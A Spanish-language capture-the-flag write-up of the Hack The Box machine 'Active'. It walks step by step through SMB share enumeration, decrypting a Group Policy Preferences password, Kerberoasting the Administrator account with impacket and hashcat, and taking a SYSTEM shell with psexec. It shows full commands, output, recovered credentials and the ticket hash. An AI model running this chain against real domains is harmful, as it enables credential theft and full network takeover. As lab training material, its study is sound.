Active-Writeup
Table of contents
Skills
- Smb enumeration
- Gpp-decrypt - AES key windows
- Kerberoasting attack - user Administrator
- Psexec - Connect as user Administrator
Reconocimiento
Vamos a realizar la maquina Active de hackthebox. Por tanto vamos a crear los directorios para organizar la información
$ mkdir Active-10.10.10.100
$ cd Active-10.10.10.100
$ mkdir nmap exploit content
Luego vamos a realizar un escaneo con nmap para ver que puertos estan abiertos en la maquina victima
$ namp -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.100 -oG allPorts
Yo lo exporto en formato grepeable por que tengo una función llamada extractPorts -> (link de la utilidad de extractPorts creada por s4vitar, instalar xclip)
$ extractPorts allPorts
[*] Extracting information...
[*] IP Address: 10.10.10.100
[*] Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172
[*] Ports copied to clipboard
Vemos varios puertos, vamos a realizar un escaneo mas minucioso sobre estos puertos
$ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172 10.10.10.100 -oN targeted
# Nmap 7.93 scan initiated as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172 -oN targeted 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-09 09:59:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4h00m08s
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-08-09T10:00:27
|_ start_date: 2023-08-09T05:36:33
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Vamos a empezar lanzando un crackmapexec para realizar un escaneo por smb/445
$ crackmapexec smb 10.10.10.100
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
Vemos un dominio active.htb, vamos agregarlo al "/etc/hosts".
$ cat /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 parrot
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# Others
10.10.10.100 active.htb
Vamos a ver si hay archivos compartidos por el servicio smb
$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Tenemos permisos de lectura sobre Replication, vamos a revisar que tiene de contenido
$ smbmap -H 10.10.10.100 -r Replication
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
Vemos un directorio active.htb, para ir descargando las cosas uno por uno. Vamos a descargarnos todo de forma recursiva.(obs: simplemente dar al enter cuando pide la contraseña)
$ smbclient //10.10.10.100/Replication
Password for [WORKGROUP\dh89]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (1,9 KiloBytes/sec) (average 0,6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0,4 KiloBytes/sec) (average 0,6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1,4 KiloBytes/sec) (average 0,7 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4,4 KiloBytes/sec) (average 1,1 KiloBytes/sec)
smb: \>
Miramos que nos descagamos por smb
$ ls
active.htb content exploit nmap
$ cd active.htb
$ tree
.
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
Vemos un .xml, vamos a hecharle un vistazo
$ cat Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Vemos una password pero esta encryptada, en este caso GPP (Group Policy Preferences). Esto es peligroso ya que microsoft en su momento, compartio la llave AES para nosotros eso no va ser ningun problema
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
El user es *svc_tgs(se encuentra en el mismo archivo), vamos a validarlo con crackmapexec
$crackmapexec smb 10.10.10.100 -u svc_tgs -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\svc_tgs:GPPstillStandingStrong2k18
Y nos pone un '[+]', pero no pwned!, y como el puerto 5985 no esta abierto, no podemos conectarnos con winrm. Asi que vamos a usar estas credenciales para conectarnos por smb y ldap. Pero no encontramos nada.
Escalada de Privilegios
En este punto se me ocurrio realizar un Kerberoasting attack, ya que poseo una credencial valida (link sobre mas info sobre Kerberoasting attack -> hacktricks)
$ date --set "$(net time -S 10.10.10.100)"
vie 11 ago 2023 05:30:28 -04
$ impacket-GetUserSPNs -request active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-11 01:39:21.761759
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$3bd21142fb87b9b15387280fda3ce9bb$a71d0d2836501b50f6f867592b83156d2d7e912d5ae25b300826f08dadb07a49f7eb775d47208757c2011e2524215eb3fb99fde4396008a6c248b459f804ac80367d89e3990a673b87329804de9da406044ec0c48cf33a05b491d7ca7c1ca8863365feb23fae64d3b7f7b7a8f5f1e93860a5baf5493151017e297d788bc819e69997bea68b9d95501ae25eeb7b71b6c793f93a8a9a113ac0e22ea1ea0117420a579a98773d480d197a756017c5a09661d6e0b1dea30da49c974f831cbc20a642be37c32a3f5c9a54a7183c213c743e1d463d2c2b47ebc07104492e5263bcc9b7accadc1b74963c083116cb3308a0e05752af3a47394fbf05304e1eb5f6d155cf24b86567b51bdc4321bbeb7f2e27786b265c94a1fb2e12ffd8a25d0fce365226f64e53a40deaceb307d4dfe4bfe0c0e20332a4ea956c0678fc70f723d478bd3410459b4393d8ee9651befd098ccce6031f78f835caf994538aa072fb661f95b7700e7bf9ff786625bb0162a7791bda4dc323b4eded7ac6f9db823ed7ce0209f6c769d7c3562a0834cdfbbed12251375fe38f12aebf0cb872a0be7087f3d92303e81a6ef088dc62843003cc16bf7a568971ba4fd92e3a168a527dad4c13985c11e71a6a1365859bbaa16db17bae2c57e474a82b210ec8f7f00fea53db0d8da8882eeb54f855f380c36be212513587c20fd3a5cecb224e39d46610c341ff99761531d3141d54e0e621ddcd9f12b72406a08840014dc341a1009f536d3da43b897c1a2a3b40d168c0117821f118c985f4d7e027e49f535940bc64f5a8c8e1e34aca67e99116edef3f94a9918cc7c8744abed25dc9aef0dc9b1fa47f9e45bd5f7cb4093f92095ca003958e6720c38791aeee32eb6e9fa49951ddc26e23ca8b692c658ef564f035611f1beb1447e39fbdc3e97575e73628e2dfb52d6be0d0bd7b273776c6c6af562dfa4ace86272740d843446af5f34df88d3fb24baded199714cd65118b4956cb7ddfb925e3d859ae8cfe4369a5042b046db04e07e3fe0e27988675d5a32d28e285f6b091ee126ab651229326e388a461bf18468fc6dd1aa69e927f640c028c0a937808897247533c0f2e71497ac35dcfc4382b2240d0cec14bee35e90c74e79506e43c92eb2b6ea47caa88854e4113ab7f572aa231710f184e87b383ce9aa56e3a3ef22f6d59edb37b60d0280fac4b2514db36a60d804c59c89688133accb4d3c9caf56bcfcbf8b5b979cc83f79beb47c960332665
Y vemos que el user Administrator es vulnerable a Kerberoasting attack, vamos a copiar el hash e intentarlo romper un hashcat el modo es el 13100 que le corresponde a "Kerberos 5, etype 23, TGS-REP"
$ cat ../content/hash
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$3bd21142fb87b9b15387280fda3ce9bb$a71d0d2836501b50f6f867592b83156d2d7e912d5ae25b300826f08dadb07a49f7eb775d47208757c2011e2524215eb3fb99fde4396008a6c248b459f804ac80367d89e3990a673b87329804de9da406044ec0c48cf33a05b491d7ca7c1ca8863365feb23fae64d3b7f7b7a8f5f1e93860a5baf5493151017e297d788bc819e69997bea68b9d95501ae25eeb7b71b6c793f93a8a9a113ac0e22ea1ea0117420a579a98773d480d197a756017c5a09661d6e0b1dea30da49c974f831cbc20a642be37c32a3f5c9a54a7183c213c743e1d463d2c2b47ebc07104492e5263bcc9b7accadc1b74963c083116cb3308a0e05752af3a47394fbf05304e1eb5f6d155cf24b86567b51bdc4321bbeb7f2e27786b265c94a1fb2e12ffd8a25d0fce365226f64e53a40deaceb307d4dfe4bfe0c0e20332a4ea956c0678fc70f723d478bd3410459b4393d8ee9651befd098ccce6031f78f835caf994538aa072fb661f95b7700e7bf9ff786625bb0162a7791bda4dc323b4eded7ac6f9db823ed7ce0209f6c769d7c3562a0834cdfbbed12251375fe38f12aebf0cb872a0be7087f3d92303e81a6ef088dc62843003cc16bf7a568971ba4fd92e3a168a527dad4c13985c11e71a6a1365859bbaa16db17bae2c57e474a82b210ec8f7f00fea53db0d8da8882eeb54f855f380c36be212513587c20fd3a5cecb224e39d46610c341ff99761531d3141d54e0e621ddcd9f12b72406a08840014dc341a1009f536d3da43b897c1a2a3b40d168c0117821f118c985f4d7e027e49f535940bc64f5a8c8e1e34aca67e99116edef3f94a9918cc7c8744abed25dc9aef0dc9b1fa47f9e45bd5f7cb4093f92095ca003958e6720c38791aeee32eb6e9fa49951ddc26e23ca8b692c658ef564f035611f1beb1447e39fbdc3e97575e73628e2dfb52d6be0d0bd7b273776c6c6af562dfa4ace86272740d843446af5f34df88d3fb24baded199714cd65118b4956cb7ddfb925e3d859ae8cfe4369a5042b046db04e07e3fe0e27988675d5a32d28e285f6b091ee126ab651229326e388a461bf18468fc6dd1aa69e927f640c028c0a937808897247533c0f2e71497ac35dcfc4382b2240d0cec14bee35e90c74e79506e43c92eb2b6ea47caa88854e4113ab7f572aa231710f184e87b383ce9aa56e3a3ef22f6d59edb37b60d0280fac4b2514db36a60d804c59c89688133accb4d3c9caf56bcfcbf8b5b979cc83f79beb47c960332665
$ hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ....
Luego de un rato, nos topamos que la contraseña es "Ticketmaster1968". Vamos a validarlo con crackmapexec
$crackmapexec smb 10.10.10.100 -u Administrator -p Ticketmaster1968
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
y vemos el (Pwn3d!), ahora podemos tirar de psexec para ganar acceso a la maquina victima
$impacket-psexec active.htb/administrator@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file cYWeJIsc.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service STVf on 10.10.10.100.....
[*] Starting service STVf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Conclusiones
Me gusto la maquina Active de htb, primera vez que tocamos crackear gracias al codigo AES y lo dicho siempre, espero que les sirva la maquina para aprender ya saben que tienen los comentarios o me pueden contactar por disc cualquier duda